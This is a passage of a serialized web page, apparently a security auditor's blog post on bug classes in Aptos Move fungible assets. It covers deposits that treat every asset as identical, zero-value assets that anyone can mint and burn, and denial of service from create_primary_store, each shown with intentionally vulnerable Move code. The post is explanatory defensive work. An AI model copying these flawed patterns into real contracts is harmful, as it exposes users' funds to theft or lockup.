fa_amount})\n}\n",[64266],{"type":26,"tag":130,"props":64267,"children":64268},{"__ignoreMap":7},[64269,64306,64344,64368,64380,64388,64433,64467,64497,64504,64541,64548,64585,64592,64638],{"type":26,"tag":137,"props":64270,"children":64271},{"class":5559,"line":5560},[64272,64277,64281,64286,64290,64294,64298,64302],{"type":26,"tag":137,"props":64273,"children":64274},{"style":5584},[64275],{"type":32,"value":64276},"public",{"type":26,"tag":137,"props":64278,"children":64279},{"style":5584},[64280],{"type":32,"value":8792},{"type":26,"tag":137,"props":64282,"children":64283},{"style":5584},[64284],{"type":32,"value":64285}," deposit",{"type":26,"tag":137,"props":64287,"children":64288},{"style":5601},[64289],{"type":32,"value":8391},{"type":26,"tag":137,"props":64291,"children":64292},{"style":6009},[64293],{"type":32,"value":2064},{"type":26,"tag":137,"props":64295,"children":64296},{"style":5590},[64297],{"type":32,"value":7072},{"type":26,"tag":137,"props":64299,"children":64300},{"style":5584},[64301],{"type":32,"value":8517},{"type":26,"tag":137,"props":64303,"children":64304},{"style":5601},[64305],{"type":32,"value":9172},{"type":26,"tag":137,"props":64307,"children":64308},{"class":5559,"line":5412},[64309,64314,64318,64322,64326,64330,64335,64339],{"type":26,"tag":137,"props":64310,"children":64311},{"style":5584},[64312],{"type":32,"value":64313},"    sender",{"type":26,"tag":137,"props":64315,"children":64316},{"style":5590},[64317],{"type":32,"value":7072},{"type":26,"tag":137,"props":64319,"children":64320},{"style":5590},[64321],{"type":32,"value":9725},{"type":26,"tag":137,"props":64323,"children":64324},{"style":5584},[64325],{"type":32,"value":9730},{"type":26,"tag":137,"props":64327,"children":64328},{"style":5601},[64329],{"type":32,"value":1108},{"type":26,"tag":137,"props":64331,"children":64332},{"style":5584},[64333],{"type":32,"value":64334},"fa",{"type":26,"tag":137,"props":64336,"children":64337},{"style":5590},[64338],{"type":32,"value":7072},{"type":26,"tag":137,"props":64340,"children":64341},{"style":6009},[64342],{"type":32,"value":64343}," FungibleAsset\n",{"type":26,"tag":137,"props":64345,"children":64346},{"class":5559,"line":5417},[64347,64351,64355,64359,64363],{"type":26,"tag":137,"props":64348,"children":64349},{"style":5601},[64350],{"type":32,"value":5671},{"type":26,"tag":137,"props":64352,"children":64353},{"style":5584},[64354],{"type":32,"value":8929},{"type":26,"tag":137,"props":64356,"children":64357},{"style":5601},[64358],{"type":32,"value":25612},{"type":26,"tag":137,"props":64360,"children":64361},{"style":5590},[64362],{"type":32,"value":12180},{"type":26,"tag":137,"props":64364,"children":64365},{"style":5601},[64366],{"type":32,"value":64367},"] {\n",{"type":26,"tag":137,"props":64369,"children":64370},{"class":5559,"line":5642},[64371,64376],{"type":26,"tag":137,"props":64372,"children":64373},{"style":5682},[64374],{"type":32,"value":64375},"    assert_not_paused",{"type":26,"tag":137,"props":64377,"children":64378},{"style":5601},[64379],{"type":32,"value":6267},{"type":26,"tag":137,"props":64381,"children":64382},{"class":5559,"line":5745},[64383],{"type":26,"tag":137,"props":64384,"children":64385},{"style":5601},[64386],{"type":32,"value":64387},"    \n",{"type":26,"tag":137,"props":64389,"children":64390},{"class":5559,"line":5850},[64391,64395,64400,64404,64409,64413,64417,64421,64425,64429],{"type":26,"tag":137,"props":64392,"children":64393},{"style":5573},[64394],{"type":32,"value":5576},{"type":26,"tag":137,"props":64396,"children":64397},{"style":5584},[64398],{"type":32,"value":64399}," fa_amount",{"type":26,"tag":137,"props":64401,"children":64402},{"style":5590},[64403],{"type":32,"value":5593},{"type":26,"tag":137,"props":64405,"children":64406},{"style":5601},[64407],{"type":32,"value":64408}," fungible_asset",{"type":26,"tag":137,"props":64410,"children":64411},{"style":5590},[64412],{"type":32,"value":6072},{"type":26,"tag":137,"props":64414,"children":64415},{"style":5682},[64416],{"type":32,"value":22900},{"type":26,"tag":137,"props":64418,"children":64419},{"style":5601},[64420],{"type":32,"value":165},{"type":26,"tag":137,"props":64422,"children":64423},{"style":5590},[64424],{"type":32,"value":5694},{"type":26,"tag":137,"props":64426,"children":64427},{"style":5584},[64428],{"type":32,"value":64334},{"type":26,"tag":137,"props":64430,"children":64431},{"style":5601},[64432],{"type":32,"value":6430},{"type":26,"tag":137,"props":64434,"children":64435},{"class":5559,"line":5878},[64436,64440,64445,64449,64454,64458,64463],{"type":26,"tag":137,"props":64437,"children":64438},{"style":5573},[64439],{"type":32,"value":5576},{"type":26,"tag":137,"props":64441,"children":64442},{"style":5584},[64443],{"type":32,"value":64444}," sender_address",{"type":26,"tag":137,"props":64446,"children":64447},{"style":5590},[64448],{"type":32,"value":5593},{"type":26,"tag":137,"props":64450,"children":64451},{"style":5682},[64452],{"type":32,"value":64453}," address_of",{"type":26,"tag":137,"props":64455,"children":64456},{"style":5601},[64457],{"type":32,"value":165},{"type":26,"tag":137,"props":64459,"children":64460},{"style":5584},[64461],{"type":32,"value":64462},"sender",{"type":26,"tag":137,"props":64464,"children":64465},{"style":5601},[64466],{"type":32,"value":6430},{"type":26,"tag":137,"props":64468,"children":64469},{"class":5559,"line":5891},[64470,64475,64479,64484,64488,64493],{"type":26,"tag":137,"props":64471,"children":64472},{"style":5682},[64473],{"type":32,"value":64474},"    check_compliance",{"type":26,"tag":137,"props":64476,"children":64477},{"style":5601},[64478],{"type":32,"value":165},{"type":26,"tag":137,"props":64480,"children":64481},{"style":5584},[64482],{"type":32,"value":64483},"fa_amount",{"type":26,"tag":137,"props":64485,"children":64486},{"style":5601},[64487],{"type":32,"value":1108},{"type":26,"tag":137,"props":64489,"children":64490},{"style":5584},[64491],{"type":32,"value":64492},"sender_address",{"type":26,"tag":137,"props":64494,"children":64495},{"style":5601},[64496],{"type":32,"value":6430},{"type":26,"tag":137,"props":64498,"children":64499},{"class":5559,"line":5909},[64500],{"type":26,"tag":137,"props":64501,"children":64502},{"style":5601},[64503],{"type":32,"value":64387},{"type":26,"tag":137,"props":64505,"children":64506},{"class":5559,"line":5930},[64507,64512,64516,64521,64525,64529,64533,64537],{"type":26,"tag":137,"props":64508,"children":64509},{"style":5682},[64510],{"type":32,"value":64511},"    increase_deposit",{"type":26,"tag":137,"props":64513,"children":64514},{"style":5601},[64515],{"type":32,"value":165},{"type":26,"tag":137,"props":64517,"children":64518},{"style":5682},[64519],{"type":32,"value":64520},"get_vault",{"type":26,"tag":137,"props":64522,"children":64523},{"style":5601},[64524],{"type":32,"value":165},{"type":26,"tag":137,"props":64526,"children":64527},{"style":5584},[64528],{"type":32,"value":64492},{"type":26,"tag":137,"props":64530,"children":64531},{"style":5601},[64532],{"type":32,"value":17769},{"type":26,"tag":137,"props":64534,"children":64535},{"style":5584},[64536],{"type":32,"value":64483},{"type":26,"tag":137,"props":64538,"children":64539},{"style":5601},[64540],{"type":32,"value":6430},{"type":26,"tag":137,"props":64542,"children":64543},{"class":5559,"line":5939},[64544],{"type":26,"tag":137,"props":64545,"children":64546},{"style":5601},[64547],{"type":32,"value":64387},{"type":26,"tag":137,"props":64549,"children":64550},{"class":5559,"line":6191},[64551,64556,64560,64564,64568,64573,64577,64581],{"type":26,"tag":137,"props":64552,"children":64553},{"style":5601},[64554],{"type":32,"value":64555},"    primary_fungible_store",{"type":26,"tag":137,"props":64557,"children":64558},{"style":5590},[64559],{"type":32,"value":6072},{"type":26,"tag":137,"props":64561,"children":64562},{"style":5682},[64563],{"type":32,"value":3846},{"type":26,"tag":137,"props":64565,"children":64566},{"style":5601},[64567],{"type":32,"value":165},{"type":26,"tag":137,"props":64569,"children":64570},{"style":5682},[64571],{"type":32,"value":64572},"global_vault_address",{"type":26,"tag":137,"props":64574,"children":64575},{"style":5601},[64576],{"type":32,"value":20968},{"type":26,"tag":137,"props":64578,"children":64579},{"style":5584},[64580],{"type":32,"value":64334},{"type":26,"tag":137,"props":64582,"children":64583},{"style":5601},[64584],{"type":32,"value":6430},{"type":26,"tag":137,"props":64586,"children":64587},{"class":5559,"line":6208},[64588],{"type":26,"tag":137,"props":64589,"children":64590},{"style":5601},[64591],{"type":32,"value":64387},{"type":26,"tag":137,"props":64593,"children":64594},{"class":5559,"line":6225},[64595,64600,64604,64609,64613,64618,64622,64626,64630,64634],{"type":26,"tag":137,"props":64596,"children":64597},{"style":5601},[64598],{"type":32,"value":64599},"    event",{"type":26,"tag":137,"props":64601,"children":64602},{"style":5590},[64603],{"type":32,"value":6072},{"type":26,"tag":137,"props":64605,"children":64606},{"style":5682},[64607],{"type":32,"value":64608},"emit",{"type":26,"tag":137,"props":64610,"children":64611},{"style":5601},[64612],{"type":32,"value":165},{"type":26,"tag":137,"props":64614,"children":64615},{"style":6009},[64616],{"type":32,"value":64617},"Deposit",{"type":26,"tag":137,"props":64619,"children":64620},{"style":5601},[64621],{"type":32,"value":47819},{"type":26,"tag":137,"props":64623,"children":64624},{"style":5584},[64625],{"type":32,"value":64492},{"type":26,"tag":137,"props":64627,"children":64628},{"style":5601},[64629],{"type":32,"value":1108},{"type":26,"tag":137,"props":64631,"children":64632},{"style":5584},[64633],{"type":32,"value":64483},{"type":26,"tag":137,"props":64635,"children":64636},{"style":5601},[64637],{"type":32,"value":35618},{"type":26,"tag":137,"props":64639,"children":64640},{"class":5559,"line":6238},[64641],{"type":26,"tag":137,"props":64642,"children":64643},{"style":5601},[64644],{"type":32,"value":6507},{"type":26,"tag":35,"props":64646,"children":64647},{},[64648],{"type":32,"value":64649},"Do you see any problems here? The application does not validate or differentiate fungible assets using their metadata, which causes all fungible asset deposits to be treated as identical.",{"type":26,"tag":35,"props":64651,"children":64652},{},[64653],{"type":32,"value":64654},"While these bugs aren't partiularly complex, they do represent an additional vulnerability class that must be checked for.",{"type":26,"tag":92,"props":64656,"children":64658},{"id":64657},"fungible-stores",[64659],{"type":32,"value":64660},"Fungible stores",{"type":26,"tag":35,"props":64662,"children":64663},{},[64664],{"type":32,"value":64665},"As mentioned, fungible assets are hot potatoes, meaning they must be destroyed after each transaction. If they lack abilities, how can they be used?",{"type":26,"tag":35,"props":64667,"children":64668},{},[64669,64671,64677],{"type":32,"value":64670},"Meet the ",{"type":26,"tag":130,"props":64672,"children":64674},{"className":64673},[],[64675],{"type":32,"value":64676},"FungibleStore",{"type":32,"value":470},{"type":26,"tag":5512,"props":64679,"children":64681},{"className":5552,"code":64680,"language":5551,"meta":7,"style":7},"struct FungibleStore has key {\n    metadata: Object\u003CMetadata>,\n    balance: u64,\n    frozen: bool,\n}\n",[64682],{"type":26,"tag":130,"props":64683,"children":64684},{"__ignoreMap":7},[64685,64709,64736,64756,64775],{"type":26,"tag":137,"props":64686,"children":64687},{"class":5559,"line":5560},[64688,64692,64697,64701,64705],{"type":26,"tag":137,"props":64689,"children":64690},{"style":5573},[64691],{"type":32,"value":11990},{"type":26,"tag":137,"props":64693,"children":64694},{"style":6009},[64695],{"type":32,"value":64696}," FungibleStore",{"type":26,"tag":137,"props":64698,"children":64699},{"style":5584},[64700],{"type":32,"value":11999},{"type":26,"tag":137,"props":64702,"children":64703},{"style":5584},[64704],{"type":32,"value":8517},{"type":26,"tag":137,"props":64706,"children":64707},{"style":5601},[64708],{"type":32,"value":5875},{"type":26,"tag":137,"props":64710,"children":64711},{"class":5559,"line":5412},[64712,64716,64720,64724,64728,64732],{"type":26,"tag":137,"props":64713,"children":64714},{"style":5584},[64715],{"type":32,"value":64153},{"type":26,"tag":137,"props":64717,"children":64718},{"style":5590},[64719],{"type":32,"value":7072},{"type":26,"tag":137,"props":64721,"children":64722},{"style":6009},[64723],{"type":32,"value":64162},{"type":26,"tag":137,"props":64725,"children":64726},{"style":5601},[64727],{"type":32,"value":8391},{"type":26,"tag":137,"props":64729,"children":64730},{"style":6009},[64731],{"type":32,"value":64171},{"type":26,"tag":137,"props":64733,"children":64734},{"style":5601},[64735],{"type":32,"value":8723},{"type":26,"tag":137,"props":64737,"children":64738},{"class":5559,"line":5417},[64739,64744,64748,64752],{"type":26,"tag":137,"props":64740,"children":64741},{"style":5584},[64742],{"type":32,"value":64743},"    balance",{"type":26,"tag":137,"props":64745,"children":64746},{"style":5590},[64747],{"type":32,"value":7072},{"type":26,"tag":137,"props":64749,"children":64750},{"style":6009},[64751],{"type":32,"value":8445},{"type":26,"tag":137,"props":64753,"children":64754},{"style":5601},[64755],{"type":32,"value":6099},{"type":26,"tag":137,"props":64757,"children":64758},{"class":5559,"line":5642},[64759,64763,64767,64771],{"type":26,"tag":137,"props":64760,"children":64761},{"style":5584},[64762],{"type":32,"value":63814},{"type":26,"tag":137,"props":64764,"children":64765},{"style":5590},[64766],{"type":32,"value":7072},{"type":26,"tag":137,"props":64768,"children":64769},{"style":6009},[64770],{"type":32,"value":14641},{"type":26,"tag":137,"props":64772,"children":64773},{"style":5601},[64774],{"type":32,"value":6099},{"type":26,"tag":137,"props":64776,"children":64777},{"class":5559,"line":5745},[64778],{"type":26,"tag":137,"props":64779,"children":64780},{"style":5601},[64781],{"type":32,"value":6507},{"type":26,"tag":35,"props":64783,"children":64784},{},[64785,64790,64792,64797,64799,64804,64806,64811,64813,64818],{"type":26,"tag":130,"props":64786,"children":64788},{"className":64787},[],[64789],{"type":32,"value":64676},{"type":32,"value":64791}," manages balances and metadata instead of holding the actual ",{"type":26,"tag":130,"props":64793,"children":64795},{"className":64794},[],[64796],{"type":32,"value":64112},{"type":32,"value":64798}," (it can't because ",{"type":26,"tag":130,"props":64800,"children":64802},{"className":64801},[],[64803],{"type":32,"value":64112},{"type":32,"value":64805}," doesn't have ",{"type":26,"tag":130,"props":64807,"children":64809},{"className":64808},[],[64810],{"type":32,"value":8526},{"type":32,"value":64812},"). Withdrawals create temporary ",{"type":26,"tag":130,"props":64814,"children":64816},{"className":64815},[],[64817],{"type":32,"value":64112},{"type":32,"value":64819}," resources, while deposits destroy them and update the balance. This design prevents freezing bypasses and improves observability.",{"type":26,"tag":3265,"props":64821,"children":64822},{},[],{"type":26,"tag":35,"props":64824,"children":64825},{},[64826,64828,64833,64835,64840],{"type":32,"value":64827},"A curious reader might wonder, is there any other way to create or destroy a ",{"type":26,"tag":130,"props":64829,"children":64831},{"className":64830},[],[64832],{"type":32,"value":64112},{"type":32,"value":64834}," besides withdrawing, depositing or minting it? There is — anyone can create and destroy a zero-value ",{"type":26,"tag":130,"props":64836,"children":64838},{"className":64837},[],[64839],{"type":32,"value":64112},{"type":32,"value":470},{"type":26,"tag":5512,"props":64842,"children":64844},{"className":5552,"code":64843,"language":5551,"meta":7,"style":7},"public fun destroy_zero(fungible_asset: FungibleAsset) {\n    let FungibleAsset { amount, metadata: _ } = fungible_asset;\n    assert!(amount == 0, error::invalid_argument(EAMOUNT_IS_NOT_ZERO));\n}\n\npublic fun zero\u003CT: key>(metadata: Object\u003CT>): FungibleAsset {\n    FungibleAsset {\n        metadata: object::convert(metadata),\n        amount: 0,\n    }\n}\n",[64845],{"type":26,"tag":130,"props":64846,"children":64847},{"__ignoreMap":7},[64848,64885,64937,64980,64987,64994,65066,65078,65116,65135,65142],{"type":26,"tag":137,"props":64849,"children":64850},{"class":5559,"line":5560},[64851,64855,64859,64864,64868,64873,64877,64881],{"type":26,"tag":137,"props":64852,"children":64853},{"style":5584},[64854],{"type":32,"value":64276},{"type":26,"tag":137,"props":64856,"children":64857},{"style":5584},[64858],{"type":32,"value":8792},{"type":26,"tag":137,"props":64860,"children":64861},{"style":5682},[64862],{"type":32,"value":64863}," destroy_zero",{"type":26,"tag":137,"props":64865,"children":64866},{"style":5601},[64867],{"type":32,"value":165},{"type":26,"tag":137,"props":64869,"children":64870},{"style":5584},[64871],{"type":32,"value":64872},"fungible_asset",{"type":26,"tag":137,"props":64874,"children":64875},{"style":5590},[64876],{"type":32,"value":7072},{"type":26,"tag":137,"props":64878,"children":64879},{"style":6009},[64880],{"type":32,"value":64141},{"type":26,"tag":137,"props":64882,"children":64883},{"style":5601},[64884],{"type":32,"value":17395},{"type":26,"tag":137,"props":64886,"children":64887},{"class":5559,"line":5412},[64888,64892,64896,64900,64904,64908,64913,64917,64921,64925,64929,64933],{"type":26,"tag":137,"props":64889,"children":64890},{"style":5573},[64891],{"type":32,"value":5576},{"type":26,"tag":137,"props":64893,"children":64894},{"style":6009},[64895],{"type":32,"value":64141},{"type":26,"tag":137,"props":64897,"children":64898},{"style":5601},[64899],{"type":32,"value":12175},{"type":26,"tag":137,"props":64901,"children":64902},{"style":5584},[64903],{"type":32,"value":22900},{"type":26,"tag":137,"props":64905,"children":64906},{"style":5601},[64907],{"type":32,"value":1108},{"type":26,"tag":137,"props":64909,"children":64910},{"style":5584},[64911],{"type":32,"value":64912},"metadata",{"type":26,"tag":137,"props":64914,"children":64915},{"style":5590},[64916],{"type":32,"value":7072},{"type":26,"tag":137,"props":64918,"children":64919},{"style":5584},[64920],{"type":32,"value":5618},{"type":26,"tag":137,"props":64922,"children":64923},{"style":5601},[64924],{"type":32,"value":38798},{"type":26,"tag":137,"props":64926,"children":64927},{"style":5590},[64928],{"type":32,"value":289},{"type":26,"tag":137,"props":64930,"children":64931},{"style":5584},[64932],{"type":32,"value":64408},{"type":26,"tag":137,"props":64934,"children":64935},{"style":5601},[64936],{"type":32,"value":5604},{"type":26,"tag":137,"props":64938,"children":64939},{"class":5559,"line":5417},[64940,64945,64949,64953,64957,64961,64966,64970,64975],{"type":26,"tag":137,"props":64941,"children":64942},{"style":5682},[64943],{"type":32,"value":64944},"    assert!",{"type":26,"tag":137,"props":64946,"children":64947},{"style":5601},[64948],{"type":32,"value":165},{"type":26,"tag":137,"props":64950,"children":64951},{"style":5584},[64952],{"type":32,"value":22900},{"type":26,"tag":137,"props":64954,"children":64955},{"style":5590},[64956],{"type":32,"value":5866},{"type":26,"tag":137,"props":64958,"children":64959},{"style":5626},[64960],{"type":32,"value":5629},{"type":26,"tag":137,"props":64962,"children":64963},{"style":5601},[64964],{"type":32,"value":64965},", error",{"type":26,"tag":137,"props":64967,"children":64968},{"style":5590},[64969],{"type":32,"value":6072},{"type":26,"tag":137,"props":64971,"children":64972},{"style":5682},[64973],{"type":32,"value":64974},"invalid_argument",{"type":26,"tag":137,"props":64976,"children":64977},{"style":5601},[64978],{"type":32,"value":64979},"(EAMOUNT_IS_NOT_ZERO));\n",{"type":26,"tag":137,"props":64981,"children":64982},{"class":5559,"line":5642},[64983],{"type":26,"tag":137,"props":64984,"children":64985},{"style":5601},[64986],{"type":32,"value":6507},{"type":26,"tag":137,"props":64988,"children":64989},{"class":5559,"line":5745},[64990],{"type":26,"tag":137,"props":64991,"children":64992},{"emptyLinePlaceholder":18},[64993],{"type":32,"value":6276},{"type":26,"tag":137,"props":64995,"children":64996},{"class":5559,"line":5850},[64997,65001,65005,65010,65014,65018,65022,65026,65030,65034,65038,65042,65046,65050,65054,65058,65062],{"type":26,"tag":137,"props":64998,"children":64999},{"style":5584},[65000],{"type":32,"value":64276},{"type":26,"tag":137,"props":65002,"children":65003},{"style":5584},[65004],{"type":32,"value":8792},{"type":26,"tag":137,"props":65006,"children":65007},{"style":5584},[65008],{"type":32,"value":65009}," zero",{"type":26,"tag":137,"props":65011,"children":65012},{"style":5601},[65013],{"type":32,"value":8391},{"type":26,"tag":137,"props":65015,"children":65016},{"style":6009},[65017],{"type":32,"value":2064},{"type":26,"tag":137,"props":65019,"children":65020},{"style":5590},[65021],{"type":32,"value":7072},{"type":26,"tag":137,"props":65023,"children":65024},{"style":5584},[65025],{"type":32,"value":8517},{"type":26,"tag":137,"props":65027,"children":65028},{"style":5601},[65029],{"type":32,"value":10195},{"type":26,"tag":137,"props":65031,"children":65032},{"style":5584},[65033],{"type":32,"value":64912},{"type":26,"tag":137,"props":65035,"children":65036},{"style":5590},[65037],{"type":32,"value":7072},{"type":26,"tag":137,"props":65039,"children":65040},{"style":6009},[65041],{"type":32,"value":64162},{"type":26,"tag":137,"props":65043,"children":65044},{"style":5601},[65045],{"type":32,"value":8391},{"type":26,"tag":137,"props":65047,"children":65048},{"style":6009},[65049],{"type":32,"value":2064},{"type":26,"tag":137,"props":65051,"children":65052},{"style":5601},[65053],{"type":32,"value":10974},{"type":26,"tag":137,"props":65055,"children":65056},{"style":5590},[65057],{"type":32,"value":7072},{"type":26,"tag":137,"props":65059,"children":65060},{"style":6009},[65061],{"type":32,"value":64141},{"type":26,"tag":137,"props":65063,"children":65064},{"style":5601},[65065],{"type":32,"value":5875},{"type":26,"tag":137,"props":65067,"children":65068},{"class":5559,"line":5878},[65069,65074],{"type":26,"tag":137,"props":65070,"children":65071},{"style":6009},[65072],{"type":32,"value":65073},"    FungibleAsset",{"type":26,"tag":137,"props":65075,"children":65076},{"style":5601},[65077],{"type":32,"value":5875},{"type":26,"tag":137,"props":65079,"children":65080},{"class":5559,"line":5891},[65081,65086,65090,65095,65099,65104,65108,65112],{"type":26,"tag":137,"props":65082,"children":65083},{"style":5584},[65084],{"type":32,"value":65085},"        metadata",{"type":26,"tag":137,"props":65087,"children":65088},{"style":5590},[65089],{"type":32,"value":7072},{"type":26,"tag":137,"props":65091,"children":65092},{"style":5601},[65093],{"type":32,"value":65094}," object",{"type":26,"tag":137,"props":65096,"children":65097},{"style":5590},[65098],{"type":32,"value":6072},{"type":26,"tag":137,"props":65100,"children":65101},{"style":5682},[65102],{"type":32,"value":65103},"convert",{"type":26,"tag":137,"props":65105,"children":65106},{"style":5601},[65107],{"type":32,"value":165},{"type":26,"tag":137,"props":65109,"children":65110},{"style":5584},[65111],{"type":32,"value":64912},{"type":26,"tag":137,"props":65113,"children":65114},{"style":5601},[65115],{"type":32,"value":9320},{"type":26,"tag":137,"props":65117,"children":65118},{"class":5559,"line":5909},[65119,65123,65127,65131],{"type":26,"tag":137,"props":65120,"children":65121},{"style":5584},[65122],{"type":32,"value":10033},{"type":26,"tag":137,"props":65124,"children":65125},{"style":5590},[65126],{"type":32,"value":7072},{"type":26,"tag":137,"props":65128,"children":65129},{"style":5626},[65130],{"type":32,"value":5629},{"type":26,"tag":137,"props":65132,"children":65133},{"style":5601},[65134],{"type":32,"value":6099},{"type":26,"tag":137,"props":65136,"children":65137},{"class":5559,"line":5930},[65138],{"type":26,"tag":137,"props":65139,"children":65140},{"style":5601},[65141],{"type":32,"value":5945},{"type":26,"tag":137,"props":65143,"children":65144},{"class":5559,"line":5939},[65145],{"type":26,"tag":137,"props":65146,"children":65147},{"style":5601},[65148],{"type":32,"value":6507},{"type":26,"tag":35,"props":65150,"children":65151},{},[65152],{"type":32,"value":65153},"In theory, this shouldn’t pose a problem. After all, having zero of something doesn’t exactly qualify as ownership.",{"type":26,"tag":35,"props":65155,"children":65156},{},[65157,65159,65164],{"type":32,"value":65158},"In practice, the ability to freely mint and burn zero ",{"type":26,"tag":130,"props":65160,"children":65162},{"className":65161},[],[65163],{"type":32,"value":64254},{"type":32,"value":65165}," of any type could present a significant risk. During our reviews, we enountered many protocols that did not account for this possibility, leading to arithmetic errors, DoS logic bugs or inaccurate calculations. Keep in mind that edge case, we'll come back to this.",{"type":26,"tag":118,"props":65167,"children":65169},{"id":65168},"primary-and-secondary-stores",[65170],{"type":32,"value":65171},"Primary and secondary stores",{"type":26,"tag":35,"props":65173,"children":65174},{},[65175,65181,65183,65189,65191,65196],{"type":26,"tag":130,"props":65176,"children":65178},{"className":65177},[],[65179],{"type":32,"value":65180},"FungibleStores",{"type":32,"value":65182}," in comparison to ",{"type":26,"tag":130,"props":65184,"children":65186},{"className":65185},[],[65187],{"type":32,"value":65188},"CoinStores",{"type":32,"value":65190}," are not unique. Each user can have multiple ",{"type":26,"tag":130,"props":65192,"children":65194},{"className":65193},[],[65195],{"type":32,"value":64676},{"type":32,"value":65197}," objects for a given token!",{"type":26,"tag":35,"props":65199,"children":65200},{},[65201,65203,65210,65212,65217],{"type":32,"value":65202},"A primary fungible store is maintained via the aptly named ",{"type":26,"tag":41,"props":65204,"children":65207},{"href":65205,"rel":65206},"https://github.com/aptos-labs/aptos-core/blob/2bea962eac4743db6cc0ae2e8a2fd7fcc323b121/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move",[45],[65208],{"type":32,"value":65209},"primary_fungible_store",{"type":32,"value":65211}," module. It's \"primary\" because of its deterministic location, which is calculated using the owner and the fungible asset's ",{"type":26,"tag":130,"props":65213,"children":65215},{"className":65214},[],[65216],{"type":32,"value":64171},{"type":32,"value":65218}," addresses. Users can also create a number of \"secondary\" fungible stores by themselves.",{"type":26,"tag":35,"props":65220,"children":65221},{},[65222],{"type":32,"value":65223},"One key feature of the primary fungible stores is their permissionless creation. This can lead to surprising denial of service bugs!",{"type":26,"tag":5512,"props":65225,"children":65227},{"className":5552,"code":65226,"language":5551,"meta":7,"style":7},"public entry fun register(\n    user: &signer, [...]\n) acquires [...] {\n    [...]\n    let wallet_store = create_primary_store(signer::address_of(sender), get_metadata());\n    [...]\n}\n",[65228],{"type":26,"tag":130,"props":65229,"children":65230},{"__ignoreMap":7},[65231,65256,65288,65311,65327,65381,65396],{"type":26,"tag":137,"props":65232,"children":65233},{"class":5559,"line":5560},[65234,65238,65243,65247,65252],{"type":26,"tag":137,"props":65235,"children":65236},{"style":5584},[65237],{"type":32,"value":64276},{"type":26,"tag":137,"props":65239,"children":65240},{"style":5584},[65241],{"type":32,"value":65242}," entry",{"type":26,"tag":137,"props":65244,"children":65245},{"style":5584},[65246],{"type":32,"value":8792},{"type":26,"tag":137,"props":65248,"children":65249},{"style":5682},[65250],{"type":32,"value":65251}," register",{"type":26,"tag":137,"props":65253,"children":65254},{"style":5601},[65255],{"type":32,"value":6054},{"type":26,"tag":137,"props":65257,"children":65258},{"class":5559,"line":5412},[65259,65264,65268,65272,65276,65280,65284],{"type":26,"tag":137,"props":65260,"children":65261},{"style":5584},[65262],{"type":32,"value":65263},"    user",{"type":26,"tag":137,"props":65265,"children":65266},{"style":5590},[65267],{"type":32,"value":7072},{"type":26,"tag":137,"props":65269,"children":65270},{"style":5590},[65271],{"type":32,"value":9725},{"type":26,"tag":137,"props":65273,"children":65274},{"style":5584},[65275],{"type":32,"value":9730},{"type":26,"tag":137,"props":65277,"children":65278},{"style":5601},[65279],{"type":32,"value":46737},{"type":26,"tag":137,"props":65281,"children":65282},{"style":5590},[65283],{"type":32,"value":12180},{"type":26,"tag":137,"props":65285,"children":65286},{"style":5601},[65287],{"type":32,"value":14363},{"type":26,"tag":137,"props":65289,"children":65290},{"class":5559,"line":5417},[65291,65295,65299,65303,65307],{"type":26,"tag":137,"props":65292,"children":65293},{"style":5601},[65294],{"type":32,"value":5671},{"type":26,"tag":137,"props":65296,"children":65297},{"style":5584},[65298],{"type":32,"value":8929},{"type":26,"tag":137,"props":65300,"children":65301},{"style":5601},[65302],{"type":32,"value":25612},{"type":26,"tag":137,"props":65304,"children":65305},{"style":5590},[65306],{"type":32,"value":12180},{"type":26,"tag":137,"props":65308,"children":65309},{"style":5601},[65310],{"type":32,"value":64367},{"type":26,"tag":137,"props":65312,"children":65313},{"class":5559,"line":5642},[65314,65319,65323],{"type":26,"tag":137,"props":65315,"children":65316},{"style":5601},[65317],{"type":32,"value":65318},"    [",{"type":26,"tag":137,"props":65320,"children":65321},{"style":5590},[65322],{"type":32,"value":12180},{"type":26,"tag":137,"props":65324,"children":65325},{"style":5601},[65326],{"type":32,"value":14363},{"type":26,"tag":137,"props":65328,"children":65329},{"class":5559,"line":5745},[65330,65334,65339,65343,65348,65352,65356,65360,65364,65368,65372,65377],{"type":26,"tag":137,"props":65331,"children":65332},{"style":5573},[65333],{"type":32,"value":5576},{"type":26,"tag":137,"props":65335,"children":65336},{"style":5584},[65337],{"type":32,"value":65338}," wallet_store",{"type":26,"tag":137,"props":65340,"children":65341},{"style":5590},[65342],{"type":32,"value":5593},{"type":26,"tag":137,"props":65344,"children":65345},{"style":5682},[65346],{"type":32,"value":65347}," create_primary_store",{"type":26,"tag":137,"props":65349,"children":65350},{"style":5601},[65351],{"type":32,"value":9784},{"type":26,"tag":137,"props":65353,"children":65354},{"style":5590},[65355],{"type":32,"value":6072},{"type":26,"tag":137,"props":65357,"children":65358},{"style":5682},[65359],{"type":32,"value":9793},{"type":26,"tag":137,"props":65361,"children":65362},{"style":5601},[65363],{"type":32,"value":165},{"type":26,"tag":137,"props":65365,"children":65366},{"style":5584},[65367],{"type":32,"value":64462},{"type":26,"tag":137,"props":65369,"children":65370},{"style":5601},[65371],{"type":32,"value":17769},{"type":26,"tag":137,"props":65373,"children":65374},{"style":5682},[65375],{"type":32,"value":65376},"get_metadata",{"type":26,"tag":137,"props":65378,"children":65379},{"style":5601},[65380],{"type":32,"value":18016},{"type":26,"tag":137,"props":65382,"children":65383},{"class":5559,"line":5850},[65384,65388,65392],{"type":26,"tag":137,"props":65385,"children":65386},{"style":5601},[65387],{"type":32,"value":65318},{"type":26,"tag":137,"props":65389,"children":65390},{"style":5590},[65391],{"type":32,"value":12180},{"type":26,"tag":137,"props":65393,"children":65394},{"style":5601},[65395],{"type":32,"value":14363},{"type":26,"tag":137,"props":65397,"children":65398},{"class":5559,"line":5878},[65399],{"type":26,"tag":137,"props":65400,"children":65401},{"style":5601},[65402],{"type":32,"value":6507},{"type":26,"tag":35,"props":65404,"children":65405},{},[65406,65407,65413,65415,65421],{"type":32,"value":19206},{"type":26,"tag":130,"props":65408,"children":65410},{"className":65409},[],[65411],{"type":32,"value":65412},"create_primary_store",{"type":32,"value":65414}," function can introduce DoS vulnerabilities because it aborts if the store already exists. Using ",{"type":26,"tag":130,"props":65416,"children":65418},{"className":65417},[],[65419],{"type":32,"value":65420},"ensure_primary_store_exists",{"type":32,"value":65422}," is recommended to avoid such issues.",{"type":26,"tag":92,"props":65424,"children":65426},{"id":65425},"fungible-assets-and-objects",[65427],{"type":32,"value":65428},"Fungible assets and objects",{"type":26,"tag":35,"props":65430,"children":65431},{},[65432,65434,65439,65441,65448],{"type":32,"value":65433},"The fungible asset standard is not 